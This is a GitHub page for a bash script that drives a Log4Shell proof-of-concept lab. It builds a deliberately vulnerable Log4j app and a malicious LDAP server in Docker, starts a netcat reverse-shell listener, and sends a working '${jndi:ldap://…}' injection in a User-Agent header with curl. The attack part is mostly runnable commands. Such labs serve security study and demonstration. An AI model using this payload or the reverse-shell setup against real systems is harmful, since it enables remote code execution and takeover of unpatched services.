-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathassist.sh
executable file
·187 lines (163 loc) · 5.05 KB
/
assist.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
#!/usr/bin/env bash
NC=$'\e[0m' # No Color
BOLD=$'\033[1m'
UNDERLINE=$'\033[4m'
RED=$'\e[31m'
GREEN=$'\e[32m'
BLUE=$'\e[34m'
ORANGE=$'\x1B[33m'
IMAGE="log4j-exploit-shell"
# Check Pre Conditions
function check_pre_conditions(){
if ! [ -x "$(command -v docker)" ]; then
echo 'Error: docker is not installed.' >&2
echo 'Goto https://www.docker.com/products/docker-desktop'
exit 1
fi
}
# Raise Error
function raise_error(){
echo -e "${BOLD}${RED}${1}${NC}" >&2
exit 1
}
# Workaround for Path Limitations in Windows
function _docker() {
export MSYS_NO_PATHCONV=1
export MSYS2_ARG_CONV_EXCL='*'
case "$OSTYPE" in
*msys*|*cygwin*) os="$(uname -o)" ;;
*) os="$(uname)";;
esac
if [[ "$os" == "Msys" ]] || [[ "$os" == "Cygwin" ]]; then
# shellcheck disable=SC2230
realdocker="$(which -a docker | grep -v "$(readlink -f "$0")" | head -1)"
printf "%s\0" "$@" > /tmp/args.txt
# --tty or -t requires winpty
if grep -ZE '^--tty|^-[^-].*t|^-t.*' /tmp/args.txt; then
#exec winpty /bin/bash -c "xargs -0a /tmp/args.txt '$realdocker'"
winpty /bin/bash -c "xargs -0a /tmp/args.txt '$realdocker'"
return 0
fi
fi
docker "$@"
return 0
}
# Shell To POC Container
function wrapper_runner(){
# Only allocate tty if one is detected. See - https://stackoverflow.com/questions/911168
if [[ -t 0 ]]; then IT+=(-i); fi
if [[ -t 1 ]]; then IT+=(-t); fi
[ "$OS_ENV" != "container" ] || raise_error "Can Not Execute Inside Container"
# check if the docker image exists - if not built it
if [ $(docker images -a | grep -c $IMAGE ) != 1 ];then
docker build -t $IMAGE .
fi
_docker run --rm "${IT[@]}" \
-e OS_ENV=container \
-p 8080:8080 \
-p 8888:8888 \
-p 1389:1389 \
--workdir /apps \
--name $IMAGE \
$IMAGE bash -c "$@"
}
# Start Apps
function poc(){
wrapper_runner "./assist.sh start && ./assist.sh logs"
}
# Shell to POC Container
function reverse_shell(){
echo -e "${RED}Awaiting For Reverse Shell Injection${NC}"
nc -lvn 4444
}
# Cat the Injected File from POC Container
function view_exploit(){
docker exec $IMAGE cat /tmp/attacked.txt
}
# Cat the Injected File from POC Container
function view_exploit(){
docker exec $IMAGE cat /tmp/attacked.txt
}
# Build Java Apps
function build(){
mvn -f log4j-exploit/pom.xml clean compile assembly:single
mvn -f jndi-exploit/pom.xml clean compile assembly:single
}
# Start Apps
function start(){
nohup java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true \
-jar log4j-exploit/target/log4j-exploit-1.0-SNAPSHOT-jar-with-dependencies.jar >> /tmp/out.txt 2>&1 &
echo -e "Log4j Vulnerable Apps Done"
nohup java -jar jndi-exploit/target/jndi-exploit-1.0-SNAPSHOT-jar-with-dependencies.jar >> /tmp/out.txt 2>&1 &
echo -e "Malicious LDAP server for JNDI injection Attacks - Done"
}
# Tail Logs
function logs(){
[ -f "/tmp/out.txt" ] && tail -f /tmp/out.txt
}
# Stop Apps
function stop(){
pid="$(lsof -t -i:8080)"
[ -n "$pid" ] && kill -9 "$pid"
pid="$(lsof -t -i:1389)"
[ -n "$pid" ] && kill -9 "$pid"
}
# Stop Apps and Clean Logs
function clean(){
echo -e "Deleting $IMAGE "
docker rmi $IMAGE
rm -fr out.txt
}
# Exploit Vulnerability
function exploit(){
if [ $(docker ps -a | grep -c "$IMAGE") != 1 ]; then
raise_error "$IMAGE not Running.\n${NC}${GREEN}Run -> ./assist.sh poc ${NC}"
fi
host_ip="$(ifconfig | grep "inet " | grep "192.168.1" | grep -Fv 127.0.0.1 | awk '{print $2}')"
id=$(docker ps -a | grep jndi-exploit | awk '{print $1}')
if [ -n "$id" ];then
echo "jndi-exploit container is $id"
host_ip=$(docker inspect --format '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' "$id")
fi
ua="User-Agent: \${jndi:ldap://$host_ip:1389/o=reference}"
echo "curl -v -H "$ua" "$host_ip:8080""
curl -v -H "$ua" "$host_ip:8080"
}
# Help
function help(){
if [ "$OS_ENV" != "container" ];then
echo -e "${RED}Usage: $0 { poc | exploit | view | shell }${NC}" >&2
echo
echo " ${ORANGE}poc -> Start Vulnerable App, Malicious JNDI Server ${NC}"
echo " ${ORANGE}exploit -> Simulate Exploit ${NC}"
echo " ${ORANGE}view -> View Exploit in POC Container ${NC}"
echo " ${ORANGE}shell -> Reverse Shell To POC Container ${NC}"
echo
else
echo -e "${RED}Usage: $0 { start | logs | stop }${NC}" >&2
echo
echo " ${ORANGE}start -> Start the Vulnerable App and Malicious JNDI Server ${NC}"
echo " ${ORANGE}logs -> View Logs ${NC}"
echo " ${ORANGE}stop -> Stop the Apps ${NC}"
echo
fi
return 1
}
function main(){
[ "$OS_ENV" != "container" ] && check_pre_conditions
opt="$1"
choice=$( tr '[:upper:]' '[:lower:]' <<<"$opt" )
case $choice in
shell) reverse_shell ;;
poc) poc ;;
build) build ;;
start) start ;;
logs) logs ;;
exploit) exploit ;;
view) view_exploit ;;
stop) stop ;;
clean) clean ;;
*) help ;;
esac
}
main "$@"